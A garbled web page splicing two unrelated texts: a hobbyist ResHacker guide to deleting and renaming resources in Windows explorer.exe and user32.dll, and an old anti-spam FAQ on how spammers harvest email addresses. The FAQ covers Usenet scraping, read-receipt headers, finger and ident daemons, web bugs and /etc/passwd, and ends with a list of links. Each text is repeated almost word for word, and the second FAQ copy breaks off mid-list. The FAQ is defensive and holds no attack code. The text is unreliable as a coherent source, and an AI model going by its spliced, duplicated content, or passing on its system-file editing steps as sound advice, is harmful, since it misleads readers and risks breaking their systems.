Categories we will edit: BITMAPS, ICONS / ICON GROUPS, MENUS, and STRING TABLES.
First we need to know where this file is, it is in "c:\windows\" under "explorer.exe."
Bitmaps: These are the pictures you see in explorer, which you can delete. I kept only the necessary ones, the ones I wanted which were #'s 172 - 175. The way you can quickly delete these are to open the folder containing the bitmaps and hit Alt + A then d. The first time you will click yes, that you want to delete them, then you can just hit alt + a and d from that point. The bitmaps I kept were the arrows that are used for the quick launches and grouping the parts of the start bar. You can also edit these bitmaps. The way you edit them, is to first right click the bitmap and copy it, then paste it into paint or something similar. Edit it, save it, and then click "Action," then "Replace Bitmap." Then browse to the correct area where you saved it and click ok. That's it to bitmaps. Most of them are used for the dialogs when customizing your start menu.
Note: If you, like me, use the classic start menu and taskbar beware: Bitmap 142 is the windows picture next to "Start" on your start button. If you want to keep it there, DON'T DELETE IT.
Icons and Icon Groups: Most of the icons in explorer are pretty much useless, no one uses them. There are two ways to go about getting rid of them.
a) Deleting them: You would delete them the same way you delete bitmaps.
Pros: Reduces file size.
Cons: You have to also edit "user32.dll." and you have to download a blank icon.
Replacing them: You would replace them with a blank icon, which you can get more information on
Pros: Avoids editing "user32.dll."
Cons: You have to download a blank icon.
They really include the same amount of work, because you will need a blank icon along the way no matter what, so its your choice on what you want to do, here is how to do both of them:
Deleting them:
You delete all the icons you don't want here by deleting the ICON GROUPS. That will save you much time. Be careful, after deleting an icon group, the selection of what to delete next will slide down a few spaces and you might not want to delete that. Make sure you know what you are deleting.
Editing user32.dll:
You open up ResHacker and browse to "c:/windows/system32/user32.dll." Then browse to the icon groups and replace the first group (100) with a blank icon. Find more information on blank icons
Replacing them: Once you have the blank icon, you would replace the icons by finding the group you want to replace, selecting it, clicking "Action," then "Replace Icon," then find the blank icon where ever it is stored on your computer and 'opening' it. Then click ok and it is replaced!
That's it for icons, it is your choice on how you want to go about changing them, I prefer deleting.
Menus: There are only 5 menus in explorer, and I only know about two of them and what they do, these changes will effect the classic menu the most.
Incase you aren't sure you the menus work, I'll give you a brief summary:
"POPUP" can be considered a folder. Examples of these are "Search," "Programs," and "Documents." If you want to delete one of these folders, you must not only delete the popup line, but the brackets and what's inside them as well.
POPUPS generally look like this:
CODE
POPUP "NAME FOR THE "FOLDER"", #'s, WORDS, 0
{
MENUITEM "(WORDS) ", #'s, WORDS
}
You would delete all of that to delete the popup.
To delete Menu items, just delete the line in which they are.
If you want to change the actual lines otherwise then deleting them (IE: the names), you would delete ONLY the part with the with the words, for example to change "Shut Down" to "Off" you would change:
CODE
MENUITEM "Sh&ut Down...", 506, MFT_STRING, MFS_ENABLED
to
CODE
MENUITEM "Off", 506, MFT_STRING, MFS_ENABLED
and nothing else.
Menu 204: The menu originally should look like this:
CODE
204 MENUEX
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP "", 0, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "", 65535, MFT_SEPARATOR, MFS_ENABLED
POPUP "&Programs", 504, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 513, MFT_STRING, MFS_GRAYED
}
POPUP "F&avorites", 507, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 65535, MFT_STRING, MFS_GRAYED
}
POPUP "&Documents", 501, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 514, MFT_STRING, MFS_GRAYED
}
POPUP "&Settings", 508, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "&Control Panel", 505, MFT_STRING, MFS_ENABLED
MENUITEM "", 65535, MFT_SEPARATOR, MFS_ENABLED
MENUITEM "&Windows Security...", 5001, MFT_STRING, MFS_ENABLED
MENUITEM "&Network Connections", 557, MFT_STRING, MFS_ENABLED
MENUITEM "&Printers and Faxes", 510, MFT_STRING, MFS_ENABLED
MENUITEM "&Taskbar and Start Menu", 413, MFT_STRING, MFS_ENABLED
}
POPUP "Sear&ch", 520, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "", 65535, MFT_SEPARATOR, MFS_ENABLED
}
MENUITEM "&Help and Support", 503, MFT_STRING, MFS_ENABLED
MENUITEM "&Run...", 401, MFT_STRING, MFS_ENABLED
MENUITEM "", 450, MFT_SEPARATOR, MFS_ENABLED
MENUITEM "S&ynchronize", 553, MFT_STRING, MFS_ENABLED
MENUITEM "&Log Off %s...", 402, MFT_STRING, MFS_ENABLED
MENUITEM "D&isconnect...", 5000, MFT_STRING, MFS_ENABLED
MENUITEM "Undock Comput&er", 410, MFT_STRING, MFS_ENABLED
MENUITEM "Sh&ut Down...", 506, MFT_STRING, MFS_ENABLED
}
}
Right away you can delete a few thing, because you don't use them, you don't need
CODE
MENUITEM "S&ynchronize", 553, MFT_STRING, MFS_ENABLED
MENUITEM "D&isconnect...", 5000, MFT_STRING, MFS_ENABLED
MENUITEM "Undock Comput&er", 410, MFT_STRING, MFS_ENABLED
unless you see them on your computer now.
This is really up to you what you do here, you can rename a ot of it, and delete a lot of it.
Mine looks really cool like this:
CODE
204 MENUEX
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP "", 0, MFT_STRING, MFS_ENABLED, 0
{
POPUP ">", 504, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 513, MFT_STRING, MFS_GRAYED
}
POPUP ">", 501, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 514, MFT_STRING, MFS_GRAYED
}
MENUITEM ">>", 401, MFT_STRING, MFS_ENABLED
MENUITEM ">>>", 506, MFT_STRING, MFS_ENABLED
}
}
I have the shut down thing, the run box, documents, and applications on this menu. It is very minimal and looks really cool.
The only other MENU in explorer I will be showing you to hack is Menu 205. You see this menu when you right click the time and date on your taskbar. It will originally look like this:
CODE
205 MENU
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP ""
{
MENUITEM "&Adjust Date/Time", 408
MENUITEM "&Customize Notifications...", 421
MENUITEM SEPARATOR
MENUITEM "Ca&scade Windows", 403
MENUITEM "Tile Windows &Horizontally", 404
MENUITEM "Tile Windows V&ertically", 405
MENUITEM "&Show the Desktop", 407
MENUITEM "&Undo", 416
MENUITEM SEPARATOR
MENUITEM "Tas&k Manager", 420
MENUITEM SEPARATOR
MENUITEM "&Lock the Taskbar", 424
MENUITEM "P&roperties", 413
}
}
I brought mine to:
CODE
205 MENU
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP ""
{
MENUITEM "Date/Time", 408
MENUITEM "Lock", 424
MENUITEM "Properties", 413
}
Do what you want here, and that's the end of menus.
String Tables: These are the biggest part of explorer and we can think of them as labels. They label most of what you see in explorer.
There are 22 folders we will be looking through, I'll point to the significant ones.
The first number will be the folder to go to, and the next number is the offset:
38 - (595) = The start button label. To leave blank, hit alt + 0160 inside the quotations.
46 - (731) = The label for the Shut Down in the start menu
515 = The labels for the right clicks in the new start menu
There you go, a complete guide to hacking explorer!
DISCLAIMER: I DON'T TAKE ANY RESPONSIBILITY FOR WHAT HAPPENS TO YOUR COMUPTER AS A RESULT OF THIS GUIDE, OR MY SCRIPT.
I wrote this guide assuming you have used ResHacker before, but will explain most of it anyway.
Categories we will edit: BITMAPS, ICONS / ICON GROUPS, MENUS, and STRING TABLES.
First we need to know where this file is, it is in "c:\windows\" under "explorer.exe."
Bitmaps: These are the pictures you see in explorer, which you can delete. I kept only the necessary ones, the ones I wanted which were #'s 172 - 175. The way you can quickly delete these are to open the folder containing the bitmaps and hit Alt + A then d. The first time you will click yes, that you want to delete them, then you can just hit alt + a and d from that point. The bitmaps I kept were the arrows that are used for the quick launches and grouping the parts of the start bar. You can also edit these bitmaps. The way you edit them, is to first right click the bitmap and copy it, then paste it into paint or something similar. Edit it, save it, and then click "Action," then "Replace Bitmap." Then browse to the correct area where you saved it and click ok. That's it to bitmaps. Most of them are used for the dialogs when customizing your start menu.
Note: If you, like me, use the classic start menu and taskbar beware: Bitmap 142 is the windows picture next to "Start" on your start button. If you want to keep it there, DON'T DELETE IT.
Icons and Icon Groups: Most of the icons in explorer are pretty much useless, no one uses them. There are two ways to go about getting rid of them.
a) Deleting them: You would delete them the same way you delete bitmaps.
Pros: Reduces file size.
Cons: You have to also edit "user32.dll." and you have to download a blank icon.
Replacing them: You would replace them with a blank icon, which you can get more information onPros: Avoids editing "user32.dll."
Cons: You have to download a blank icon.
They really include the same amount of work, because you will need a blank icon along the way no matter what, so its your choice on what you want to do, here is how to do both of them:
Deleting them:
You delete all the icons you don't want here by deleting the ICON GROUPS. That will save you much time. Be careful, after deleting an icon group, the selection of what to delete next will slide down a few spaces and you might not want to delete that. Make sure you know what you are deleting.
Editing user32.dll:
You open up ResHacker and browse to "c:/windows/system32/user32.dll." Then browse to the icon groups and replace the first group (100) with a blank icon. Find more information on blank icons
Replacing them: Once you have the blank icon, you would replace the icons by finding the group you want to replace, selecting it, clicking "Action," then "Replace Icon," then find the blank icon where ever it is stored on your computer and 'opening' it. Then click ok and it is replaced!
That's it for icons, it is your choice on how you want to go about changing them, I prefer deleting.
Menus: There are only 5 menus in explorer, and I only know about two of them and what they do, these changes will effect the classic menu the most.
Incase you aren't sure you the menus work, I'll give you a brief summary:
"POPUP" can be considered a folder. Examples of these are "Search," "Programs," and "Documents." If you want to delete one of these folders, you must not only delete the popup line, but the brackets and what's inside them as well.
POPUPS generally look like this:
CODE
POPUP "NAME FOR THE "FOLDER"", #'s, WORDS, 0
{
MENUITEM "(WORDS) ", #'s, WORDS
}
You would delete all of that to delete the popup.
To delete Menu items, just delete the line in which they are.
If you want to change the actual lines otherwise then deleting them (IE: the names), you would delete ONLY the part with the with the words, for example to change "Shut Down" to "Off" you would change:
CODE
MENUITEM "Sh&ut Down...", 506, MFT_STRING, MFS_ENABLED
to
CODE
MENUITEM "Off", 506, MFT_STRING, MFS_ENABLED
and nothing else.
Menu 204: The menu originally should look like this:
CODE
204 MENUEX
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP "", 0, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "", 65535, MFT_SEPARATOR, MFS_ENABLED
POPUP "&Programs", 504, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 513, MFT_STRING, MFS_GRAYED
}
POPUP "F&avorites", 507, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 65535, MFT_STRING, MFS_GRAYED
}
POPUP "&Documents", 501, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 514, MFT_STRING, MFS_GRAYED
}
POPUP "&Settings", 508, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "&Control Panel", 505, MFT_STRING, MFS_ENABLED
MENUITEM "", 65535, MFT_SEPARATOR, MFS_ENABLED
MENUITEM "&Windows Security...", 5001, MFT_STRING, MFS_ENABLED
MENUITEM "&Network Connections", 557, MFT_STRING, MFS_ENABLED
MENUITEM "&Printers and Faxes", 510, MFT_STRING, MFS_ENABLED
MENUITEM "&Taskbar and Start Menu", 413, MFT_STRING, MFS_ENABLED
}
POPUP "Sear&ch", 520, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "", 65535, MFT_SEPARATOR, MFS_ENABLED
}
MENUITEM "&Help and Support", 503, MFT_STRING, MFS_ENABLED
MENUITEM "&Run...", 401, MFT_STRING, MFS_ENABLED
MENUITEM "", 450, MFT_SEPARATOR, MFS_ENABLED
MENUITEM "S&ynchronize", 553, MFT_STRING, MFS_ENABLED
MENUITEM "&Log Off %s...", 402, MFT_STRING, MFS_ENABLED
MENUITEM "D&isconnect...", 5000, MFT_STRING, MFS_ENABLED
MENUITEM "Undock Comput&er", 410, MFT_STRING, MFS_ENABLED
MENUITEM "Sh&ut Down...", 506, MFT_STRING, MFS_ENABLED
}
}
Right away you can delete a few thing, because you don't use them, you don't need
CODE
MENUITEM "S&ynchronize", 553, MFT_STRING, MFS_ENABLED
MENUITEM "D&isconnect...", 5000, MFT_STRING, MFS_ENABLED
MENUITEM "Undock Comput&er", 410, MFT_STRING, MFS_ENABLED
unless you see them on your computer now.
This is really up to you what you do here, you can rename a ot of it, and delete a lot of it.
Mine looks really cool like this:
CODE
204 MENUEX
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP "", 0, MFT_STRING, MFS_ENABLED, 0
{
POPUP ">", 504, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 513, MFT_STRING, MFS_GRAYED
}
POPUP ">", 501, MFT_STRING, MFS_ENABLED, 0
{
MENUITEM "(Empty) ", 514, MFT_STRING, MFS_GRAYED
}
MENUITEM ">>", 401, MFT_STRING, MFS_ENABLED
MENUITEM ">>>", 506, MFT_STRING, MFS_ENABLED
}
}
I have the shut down thing, the run box, documents, and applications on this menu. It is very minimal and looks really cool.
The only other MENU in explorer I will be showing you to hack is Menu 205. You see this menu when you right click the time and date on your taskbar. It will originally look like this:
CODE
205 MENU
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP ""
{
MENUITEM "&Adjust Date/Time", 408
MENUITEM "&Customize Notifications...", 421
MENUITEM SEPARATOR
MENUITEM "Ca&scade Windows", 403
MENUITEM "Tile Windows &Horizontally", 404
MENUITEM "Tile Windows V&ertically", 405
MENUITEM "&Show the Desktop", 407
MENUITEM "&Undo", 416
MENUITEM SEPARATOR
MENUITEM "Tas&k Manager", 420
MENUITEM SEPARATOR
MENUITEM "&Lock the Taskbar", 424
MENUITEM "P&roperties", 413
}
}
I brought mine to:
CODE
205 MENU
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
{
POPUP ""
{
MENUITEM "Date/Time", 408
MENUITEM "Lock", 424
MENUITEM "Properties", 413
}
Do what you want here, and that's the end of menus.
String Tables: These are the biggest part of explorer and we can think of them as labels. They label most of what you see in explorer.
There are 22 folders we will be looking through, I'll point to the significant ones.
The first number will be the folder to go to, and the next number is the offset:
38 - (595) = The start button label. To leave blank, hit alt + 0160 inside the quotations.
46 - (731) = The label for the Shut Down in the start menu
515 = The labels for the right clicks in the new start menu
There you go, a complete guide to hacking explorer!
How do spammers get email addresses?!?
There are many ways in which spammers can get your email address. The ones I know of are :
1.
From posts to UseNet with your email address.
Spammers regularily scan UseNet for email address, using ready made programs designed to do so. Some programs just look at articles headers which contain email address (From:, Reply-To:, etc), while other programs check the articles' bodies, starting with programs that look at signatures, through programs that take everything that contain a '@' character and attempt to demunge munged email addresses.
There have been reports of spammers demunging email addresses on occasions, ranging from demunging a single address for purposes of revenge spamming to automatic methods that try to unmunge email addresses that were munged in some common ways, e.g. remove such strings as 'nospam' from email addresses.
As people who where spammed frequently report that spam frequency to their mailbox dropped sharply after a period in which they did not post to UseNet, as well as evidence to spammers' chase after 'fresh' and 'live' addresses, this technique seems to be the primary source of email addresses for spammers.
2.
From mailing lists.
Spammers regularily attempt to get the lists of subscribers to mailing lists [some mail servers will give those upon request],knowing that the email addresses are unmunged and that only a few of the addresses are invalid.
When mail servers are configured to refuse such requests, another trick might be used - spammers might send an email to the mailing list with the headers Return-Receipt-To: or X-Confirm-Reading-To: . Those headers would cause some mail transfer agents and reading programs to send email back to the saying that the email was delivered to / read at a given email address, divulging it to spammers.
A different technique used by spammers is to request a mailing lists server to give him the list of all mailing lists it carries (an option implemented by some mailing list servers for the convenience of legitimate users), and then send the spam to the mailing list's address, leaving the server to do the hard work of forwarding a copy to each subscribed email address.
[I know spammers use this trick from bad experience - some spammer used this trick on the list server of the company for which I work, easily covering most of the employees, including employees working well under a month and whose email addresses would be hard to findin other ways.]
3.
From web pages.
Spammers have programs which spider through web pages, looking for email addresses, e.g. email addresses contained in mailto: HTML tags [those you can click on and get a mail window opened]
Some spammers even target their mail based on web pages. I've discovered a web page of mine appeared in Yahoo as some spammer harvested email addresses from each new page appearing in Yahoo and sent me a spam regarding that web page.
A widely used technique to fight this technique is the 'poison' CGI script. The script creates a page with several bogus email addresses and a link to itself. Spammers' software visiting the page would harvest the bogus email addresses and follow up the link, entering an infinite loop polluting their lists with bogus email addresses.
For more information about the poision script, see http://www.monkeys.com/wpoison/
4.
From various web and paper forms.
Some sites request various details via forms, e.g. guest books & registrations forms. Spammers can get email addresses from those either because the form becomes available on the world wide web, or because the site sells / gives the emails list to others.
Some companies would sell / give email lists filled in on paper forms, e.g. organizers of conventions would make a list of participants' email addresses, and sell it when it's no longer needed.
Some spammers would actually type E-mail addresses from printed material, e.g. professional directories & conference proceedings.
Domain name registration forms are a favourite as well - addresses are most usually correct and updated, and people read the emails sent to them expecting important messages.
5.
Via an Ident daemon.
Many unix computers run a daemon (a program which runs in the background, initiated by the system administrator), intended to allow other computers to identify people who connect to them.
When a person surfs from such a computer connects to a web site or news server, the site or server can connect the person's computer back and ask that daemon's for the person's email address.
Some chat clients on PCs behave similarily, so using IRC can cause an email address to be given out to spammers.
6.
From a web browser.
Some sites use various tricks to extract a surfer's email address from the web browser, sometimes without the surfer noticing it. Those techniques include :
1.
Making the browser fetch one of the page's images through an anonymous FTP connection to the site.
Some browsers would give the email address the user has configured into the browser as the password for the anonymous FTP account. A surfer not aware of this technique will not notice that the email address has leaked.
2.
Using JavaScript to make the browser send an email to a chosen email address with the email address configured into the browser.
Some browsers would allow email to be sent when the mouse passes over some part of a page. Unless the browser is properly configured, no warning will be issued.
3.
Using the HTTP_FROM header that browsers send to the server.
Some browsers pass a header with your email address to every web server you visit. To check if your browser simply gives your email address to everybody this way, visit http://www.cs.rochester.edu/u/ferguson/BrowserCheck.cgi
It's worth noting here that when one reads E-mail with a browser (or any mail reader that understands HTML), the reader should be aware of active content (Java applets, Javascript, VB, etc) as well as web bugs.
An E-mail containing HTML may contain a script that upon being read (or even the subject being highlighted) automatically sends E-mail to any E-mail addresses. A good example of this case is the Melissa virus. Such a script could send the spammer not only the reader's E-mail address but all the addresses on the reader's address book.
http://www.cert.org/advisories/CA-99-04-Me...acro-Virus.html
A web bugs FAQ by Richard M. Smith can be read at http://www.tiac.net/users/smiths/privacy/wbfaq.htm
7.
From IRC and chat rooms.
Some IRC clients will give a user's email address to anyone who cares to ask it. Many spammers harvest email addresses from IRC, knowing that those are 'live' addresses and send spam to those email addresses.
This method is used beside the annoying IRCbots that send messages interactively to IRC and chat rooms without attempting to recognize who is participating in the first place.
This is another major source of email addresses for spammers, especially as this is one of the first public activities newbies join, making it easy for spammers to harvest 'fresh' addresses of people who might have very little experience dealing with spam.
AOL chat rooms are the most popular of those - according to reports there's a utility that can get the screen names of participants in AOL chat rooms. The utility is reported to be specialized for AOL due to two main reasons - AOL makes the list of the actively participating users' screen names available and AOL users are considered prime targets by spammers due to the reputation of AOL as being the ISP of choice by newbies.
8.
From finger daemons.
Some finger daemons are set to be very friendly - a finger query asking for john@host will produce list info including login names for all people named John on that host. A query for @host will produce a list of all currently logged-on users.
Spammers use this information to get extensive users list from hosts, and of active accounts - ones which are 'live' and will read their mail soon enough to be really attractive spam targets.
9.
AOL profiles.
Spammers harvest AOL names from user profiles lists, as it allows them to 'target' their mailing lists. Also, AOL has a name being the choice ISP of newbies, who might not know how to recognize scams or know how to handle spam.
10.
From domain contact points.
Every domain has one to three contact points - administration, technical, and billing. The contact point includes the email address of the contact person.
As the contact points are freely available, e.g. using the 'whois' command, spammers harvest the email addresses from the contact points for lists of domains (the list of domain is usually made available to the public by the domain registries). This is a tempting methods for spammers, as those email addresses are most usually valid and mail sent to it is being read regularily.
11.
By guessing & cleaning.
Some spammers guess email addresses, send a test message (or a real spam) to a list which includes the guessed addresses. Then they wait for either an error message to return by email, indicating that the email address is correct, or for a confirmation. A confirmation could be solicited by inserting non-standard but commonly used mail headers requesting that the delivery system and/or mail client send a confirmation of delivery or reading. No news are, of coures, good news for the spammer.
Specifically, the headers are -
Return-Receipt-To: which causes a delivery confirmation to be sent, and
X-Confirm-Reading-To: which causes a reading confirmation to be sent.
Another method of confirming valid email addresses is sending HTML in the email's body (that is sending a web page as the email's content), and embedding in the HTML an image. Mail clients that decode HTML, e.g. as Outlook and Eudora do in the preview pane, will attempt fetching the image - and some spammers put the recipient's email address in the image's URL, and check the web server's log for the email addresses of recipients who viewed the spam.
So it's good advice to set the mail client to *not* preview rich media emails, which would protect the recipient from both accidently confirming their email addresses to spammers and viruses.
Guessing could be done based on the fact that email addresses are based on people's names, usually in commonly used ways (first.last@domain or an initial of one name followed / preceded by the other @domain)
Also, some email addresses are standard - postmaster is mandated by the RFCs for internet mail. Other common email addresses are postmaster, hostmaster, root [for unix hosts], etc.
12.
From white & yellow pages.
There are various sites that serve as white pages, sometimes named people finders web sites. Yellow pages now have an email directory on the web.
Those white/yellow pages contain addresses from various sources, e.g. from UseNet, but sometimes your E-mail address will be registered for you. Example - HotMail will add E-mail addresses to BigFoot by default, making new addresses available to the public.
Spammers go through those directories in order to get email addresses. Most directories prohibit email address harvesting by spammers, but as those databases have a large databases of email addresses + names, it's a tempting target for spammers.
13.
By having access to the same computer.
If a spammer has an access to a computer, he can usually get a list of valid usernames (and therefore email addresses) on that computer.
On unix computers the users file (/etc/passwd) is commonly world readable, and the list of currently logged-in users is listed via the 'who' command.
14.
From a previous owner of the email address.
An email address might have been owned by someone else, who disposed of it. This might happen with dialup usernames at ISPs - somebody signs up for an ISP, has his/her email address harvested by spammers, and cancel the account. When somebody else signs up with the same ISP with the same username, spammers already know of it.
Similar things can happen with AOL screen names - somebody uses a screen name, gets tired of it, releases it. Later on somebody else might take the same screen name.
15.
Using social engineering.
This method means the spammer uses a hoax to convince peopleinto giving him valid E-mail addresses.
16.
A good example is Richard Douche's "Free CD's" chain letter. The letter promises a free CD for every person to whom the letter is forwarded to as long as it is CC'ed to Richard.
Richard claimed to be associated with Amazon and Music blvd, among other companies, who authorized him to make this offer. Yet hesupplied no references to web pages and used a free E-mail address.
All Richard wanted was to get people to send him valid E-mail addresses in order to build a list of addresses to spam and/or sell.
17.
From the address book and emails on other people's computers.
Some viruses & worms spread by emailing themselves to all the email addresses they can find in the email address book. As some people forward jokes and other material by email to their friends, putting their friends' email addresses on either the To: or Cc: fields, rather than the BCc: field, some viruses and warms scan the mail folders for email addresses that are not in the address book, in hope to hit addresses the computer owner's friends' friends, friends' friends' friends, etc.
If it wasn't already done, it's just a matter of time before such malware will not only spam copies of itself, but also send the extracted list of email addresses to it's creator.
As invisible email addresses can't be harvested, it's good advice to have the email addresesses of recipients of jokes & the like on BCc:, and if forwarded from somebody else remove from the email's body all the email addresses inserted by the previous sender.
18.
Buying lists from others.
This one covers two types of trades. The first type consists of buying a list of email addresses (often on CD) that were harvested via other methods, e.g. someone harvesting email addresses from UseNet and sells the list either to a company that wishes to advertise via email (sometimes passing off the list as that of people who opted-in for emailed advertisements) or to others who resell the list.
The second type consists of a company who got the email addresses legitimately (e.g. a magazine that asks subscribers for their email in order to keep in touch over the Internet) and sells the list for the extra income. This extends to selling of email addresses acompany got via other means, e.g. people who just emailed the companywith inquiries in any context.
The third type consist of technical staff selling the email address for money to spammers. There was a news story about an AOL employee who sold AOL email addresses to a spammer.
19.
By hacking into sites.
I've heard rumours that sites that supply free email addresses were hacked in order to get the list of email addresses, somewhatlike e-commerce sites being hacked to get a list of credit cards.
If your address was harvested and you get spammed, the following pages could assist you in tracking the spammer down :
1.
MindSpring's page explaining how to get an email's headers
http://help.mindspring.com/features/emailh...rs/extended.htm
2.
The spam FAQ, maintained by Ken Hollis.
http://digital.net/~gandalf/spamfaq.html
http://www.cs.ruu.nl/wais/html/na-dir/net-...q/spam-faq.html
3.
The Reporting Spam page, an excellent resource.
http://www.ao.net/waytosuccess/
4.
Reading Mail headers.
http://www.stopspam.org/email/headers/headers.html
5.
Julian Haight's Spam Cop page.
http://spamcop.net/
6.
Chris Hibbert's Junk Mail FAQ.
http://www.fortnet.org/WidowNet/faqs/junkmail.htm
7.
Sam Spade, Spam hunter.
http://samspade.org/
8.
Penn's Page of Spam.
http://home.att.net/~penn/spam.htm
9.
WD Baseley's Address Munging FAQ
http://members.aol.com/emailfaq/mungfaq.html
10.
Fight Spam on the Internet site
http://spam.abuse.net/
11.
The Spam Recycling Center
http://www.spamrecycle.com/
12.
The Junk Busters Site
http://www.junkbusters.com/
13.
The Junk Email site
http://www.junkemail.org/
14.
BCP 30: Anti-Spam Recommendations for SMTP MTAs
ftp://ftp.isi.edu/in-notes/bcp/bcp30.txt
15.
FYI 28: Netiquette Guidelines
ftp://ftp.isi.edu/in-notes/fyi/fyi28.txt
FYI 35: DON'T SPEW
A Set of Guidelines for Mass Unsolicited Mailings and Postings
ftp://ftp.isi.edu/in-notes/fyi/fyi35.txt
Several sites on the web will help in tracing spam :
1.
Pete Bowden's list of traceroute gateways
http://www.missing.com/traceroute.html
To find traceroute gateways in any country, visit here.
http://www.traceroute.org/
2.
Allwhois.com gates to whois on any domain world-wide
http://www.allwhois.com/
3.
A list of whois servers, collected by Matt Power
ftp://sipb.mit.edu/pub/whois/whois-servers.list
4.
Alldomains.com site - links to NICs worldwide.
http://www.alldomains.com/
A similar page can be found at
http://www.forumnett.no/domreg.html
5.
The Coalition Against Usolicited Commerical E-mail.
http://www.cauce.org/
The European CAUCE.
http://www.euro.cauce.org/en/index.html
The Coalition Against Unsolicited Bulk Email, Australia.
http://www.caube.org.au/
The Russian Anti-Spam organization.
http://www.antispam.ru/
6.
No More Spam - ISP Spam-Blocking Interferes With Business
http://www.byte.com/columns/digitalbiz/199...0405coombs.html
7.
Removing the Spam, By Geoff Mulligan, Published by Addison Wesley, ISBN 0-201-37957-0
A good book about handling spam.
Legal resources :
1.
FTC Consumer Alert - FTC Names Its Dirty Dozen: 12 Scams Most Likely to Arrive Via Bulk email
http://www.ftc.gov/bcp/conline/pubs/alerts/doznalrt.htm
2.
Report to the Federal Trade Commision of the Ad-Hoc Working Group on Unsolicited Commercial Mail. http://www.cdt.org/spam/
3.
Pyramid Schemes, Ponzi Schemes, and Related Frauds
http://www.impulse.net/~thebob/Pyramid.html
4.
The AOL vs. Cyberpromo case
http://legal.web.aol.com/decisions/dljunk/cyber.html
Nine New Lawsuits Press Release.
http://legal.web.aol.com/decisions/dljunk/ninepress.html
5.
"Intel scores in email suit", by Jim Hu, CNET News.com.
http://www.news.com/News/Item/0,4,29574,00.html?st.ne.ni.lh
6.
The John Marshall Law School spam page
http://www.jmls.edu/cyber/index/spam.html
7.
First amendment issues related to UBE, by Paul L. Schmehl.
http://www.utdallas.edu/~pauls/spam_law.html
8.
U.S. Anti-Spam Laws
http://www.the-dma.org/antispam/statespamlaws.shtml
9.
The UK Data Protection Law
http://www.dataprotection.gov.uk/
10.
There are many ways in which spammers can get your email address. The ones I know of are :
1.
From posts to UseNet with your email address.
Spammers regularily scan UseNet for email address, using ready made programs designed to do so. Some programs just look at articles headers which contain email address (From:, Reply-To:, etc), while other programs check the articles' bodies, starting with programs that look at signatures, through programs that take everything that contain a '@' character and attempt to demunge munged email addresses.
There have been reports of spammers demunging email addresses on occasions, ranging from demunging a single address for purposes of revenge spamming to automatic methods that try to unmunge email addresses that were munged in some common ways, e.g. remove such strings as 'nospam' from email addresses.
As people who where spammed frequently report that spam frequency to their mailbox dropped sharply after a period in which they did not post to UseNet, as well as evidence to spammers' chase after 'fresh' and 'live' addresses, this technique seems to be the primary source of email addresses for spammers.
2.
From mailing lists.
Spammers regularily attempt to get the lists of subscribers to mailing lists [some mail servers will give those upon request],knowing that the email addresses are unmunged and that only a few of the addresses are invalid.
When mail servers are configured to refuse such requests, another trick might be used - spammers might send an email to the mailing list with the headers Return-Receipt-To: or X-Confirm-Reading-To: . Those headers would cause some mail transfer agents and reading programs to send email back to the saying that the email was delivered to / read at a given email address, divulging it to spammers.
A different technique used by spammers is to request a mailing lists server to give him the list of all mailing lists it carries (an option implemented by some mailing list servers for the convenience of legitimate users), and then send the spam to the mailing list's address, leaving the server to do the hard work of forwarding a copy to each subscribed email address.
[I know spammers use this trick from bad experience - some spammer used this trick on the list server of the company for which I work, easily covering most of the employees, including employees working well under a month and whose email addresses would be hard to findin other ways.]
3.
From web pages.
Spammers have programs which spider through web pages, looking for email addresses, e.g. email addresses contained in mailto: HTML tags [those you can click on and get a mail window opened]
Some spammers even target their mail based on web pages. I've discovered a web page of mine appeared in Yahoo as some spammer harvested email addresses from each new page appearing in Yahoo and sent me a spam regarding that web page.
A widely used technique to fight this technique is the 'poison' CGI script. The script creates a page with several bogus email addresses and a link to itself. Spammers' software visiting the page would harvest the bogus email addresses and follow up the link, entering an infinite loop polluting their lists with bogus email addresses.
For more information about the poision script, see http://www.monkeys.com/wpoison/
4.
From various web and paper forms.
Some sites request various details via forms, e.g. guest books & registrations forms. Spammers can get email addresses from those either because the form becomes available on the world wide web, or because the site sells / gives the emails list to others.
Some companies would sell / give email lists filled in on paper forms, e.g. organizers of conventions would make a list of participants' email addresses, and sell it when it's no longer needed.
Some spammers would actually type E-mail addresses from printed material, e.g. professional directories & conference proceedings.
Domain name registration forms are a favourite as well - addresses are most usually correct and updated, and people read the emails sent to them expecting important messages.
5.
Via an Ident daemon.
Many unix computers run a daemon (a program which runs in the background, initiated by the system administrator), intended to allow other computers to identify people who connect to them.
When a person surfs from such a computer connects to a web site or news server, the site or server can connect the person's computer back and ask that daemon's for the person's email address.
Some chat clients on PCs behave similarily, so using IRC can cause an email address to be given out to spammers.
6.
From a web browser.
Some sites use various tricks to extract a surfer's email address from the web browser, sometimes without the surfer noticing it. Those techniques include :
1.
Making the browser fetch one of the page's images through an anonymous FTP connection to the site.
Some browsers would give the email address the user has configured into the browser as the password for the anonymous FTP account. A surfer not aware of this technique will not notice that the email address has leaked.
2.
Using JavaScript to make the browser send an email to a chosen email address with the email address configured into the browser.
